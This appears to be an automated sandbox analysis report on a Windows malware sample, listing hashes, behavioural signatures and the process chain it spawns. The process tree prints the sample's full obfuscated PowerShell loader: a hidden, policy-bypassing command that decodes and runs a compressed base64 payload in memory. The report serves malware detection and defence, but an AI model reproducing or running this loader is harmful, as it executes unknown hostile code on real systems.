Analysis
-
max time kernel
122s -
max time network
129s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
19-01-2024 03:59
Static task
static1
Behavioral task
behavioral1
Sample
66a3dd68441b8cbe21d932b5f5e8ae1e.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
66a3dd68441b8cbe21d932b5f5e8ae1e.exe
Resource
win10v2004-20231215-en
General
-
Target
66a3dd68441b8cbe21d932b5f5e8ae1e.exe
-
Size
91KB
-
MD5
66a3dd68441b8cbe21d932b5f5e8ae1e
-
SHA1
99d4e3b63b08a2283d3ca70b9904ed30a9ccff80
-
SHA256
b5b2c23a7ce003426bf9eed344f6a3e807e17510b1d41cb79a8b07059cd7b70e
-
SHA512
faf75b1dc80dddd55e19b342cc4d7cece58de7e163b8d2cdd9dc43588d4029011cff7ff30755962b073464d802db84d7b949eb05e53680a7bef3b2485dac5608
-
SSDEEP
1536:D7fbN3eEDhDPA/pICdUkbBtW7upvaLU0bI5taxKo0IOlnToIf4wOitOj:f7DhdC6kzWypvaQ0FxyNTBf4N
Malware Config
Signatures
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 1948 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1948 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1948 powershell.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 2312 wrote to memory of 2716 2312 66a3dd68441b8cbe21d932b5f5e8ae1e.exe 29 PID 2312 wrote to memory of 2716 2312 66a3dd68441b8cbe21d932b5f5e8ae1e.exe 29 PID 2312 wrote to memory of 2716 2312 66a3dd68441b8cbe21d932b5f5e8ae1e.exe 29 PID 2312 wrote to memory of 2716 2312 66a3dd68441b8cbe21d932b5f5e8ae1e.exe 29 PID 2716 wrote to memory of 1948 2716 cmd.exe 30 PID 2716 wrote to memory of 1948 2716 cmd.exe 30 PID 2716 wrote to memory of 1948 2716 cmd.exe 30 PID 2716 wrote to memory of 1948 2716 cmd.exe 30
Processes
-
C:\Users\Admin\AppData\Local\Temp\66a3dd68441b8cbe21d932b5f5e8ae1e.exe"C:\Users\Admin\AppData\Local\Temp\66a3dd68441b8cbe21d932b5f5e8ae1e.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2312 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\55ED.tmp\55EE.tmp\55EF.bat C:\Users\Admin\AppData\Local\Temp\66a3dd68441b8cbe21d932b5f5e8ae1e.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2716 -
C:\Windows\syswow64\windowspowershell\v1.0\powershell.exeC:\Windows\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\"nVPbTttAEH33V4wsS9iKbTkXUBqExE20SG2KCGofojw4m4FsWe9au+MkhubfOwanLYhWVZ+OvTtzzpnLBgKO4Nj3pudKXRalsRT692g1qn4vXSjlRzMoq7mSAhzlxIAb4nu41HRFFr5IS1WuTpQyImzP1jFUUhNsWqxbfIgO/1vnzGJOeLNkWOx0qpZ3FcMv5fbrN+32pFH3jz2y9WPguOgxrpPP828oCCa1IyzSMVI6MeIeybUI4fSNu5PFwqJzF3khVT0bjVgALQesjb2P4a2MZ7ypS+TwCXERxduBV9aQEUa1oTeijLzApWdGazYa7nXf9dLuwTDtDfppt9/bi2GYDbMIvoOpKNGVUocQlFzd9MTavDH33LhLzV3VAkN/XhP6MQwiDtxwILNfo0C5wjAoXxE98H3mBfU/8E1PJbHLFVruRePccFf6PeaMs6iz36jV02zWEG5OL7z1UiqEkBUSRX9PjuCxcdJ5abWOg4fOftyN/9zuC5XfOWYbG40RbL1bY1lRHnXZi2RdhEHz1emwApsLZONuR/fK0XukUy7UhVNeqhkb+ZDrhcKIs5LubOsFxLm8F0kzOEgKLOZoz/FWaknSaAgEJOO8QPC/St3v+ZBo/nNlLhCeTi4qLZpIB0mZO0dLWzUDOgpoNHrxxrI4qNOPqO9oGWebfpZlDIMs8nbOrytNssD0aStNOUG7kgJd+im3bpmrZoSmrJsOQsZze34dszDYpLu2R1EMP0V4/2g39fb5sWIcbOIGXq3ehHJLyUQhlpBMUBi9gOHBIMu2IiexfNz+AA==\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();"3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1948
-
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD54f8c3c64b91050a6c7e3ee3fab155940
SHA134e385a57fadc2a7f2d82202a00567acc5fe8415
SHA2568126706137e9ec0c84c2dee9ccc298e29193e4c52270fab01fabe85ffb21edb1
SHA51249379ee4b099a6ba025205c7c63397cb26810842905f08274365697046b6ca2df461201250dce4041c3daeca95c3564f68a11d8990a581ab84f2f210965ee0ff